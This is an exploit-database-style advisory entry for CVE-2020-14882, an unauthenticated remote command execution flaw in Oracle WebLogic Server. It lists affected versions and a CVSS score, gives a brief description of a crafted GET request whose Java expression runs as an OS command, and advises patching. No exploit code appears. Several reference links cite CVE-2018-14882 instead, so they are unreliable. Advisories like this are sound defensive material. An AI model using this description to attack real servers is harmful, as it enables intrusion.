Vendor: WebLogic Server
By: Nguyen Jang
CVSS: 9.8 (HIGH)
Vulnerability Type: Unauthenticated RCE
CWE: 78
Product Name: WebLogic Server
Affected Version From: 10.3.6.0.0
Affected Version To: 14.1.1.0.0
Patch Exists: YES
Related CVE: CVE-2020-14882
CPE: a:oracle:weblogic_server
Metasploit:
https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2020-14882/
https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2018-14882/
https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-14882/
https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-14882/
https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-14882/
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2020
Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 – Unauthenticated RCE via GET request
This exploit allows an attacker to execute arbitrary commands on a vulnerable Oracle WebLogic Server instance via a single HTTP GET request. The request carries a specially crafted payload that the server processes: a Java expression that the server evaluates and then runs as an operating-system command.
Mitigation:
Oracle has released a patch for this vulnerability. It is recommended to apply the patch as soon as possible.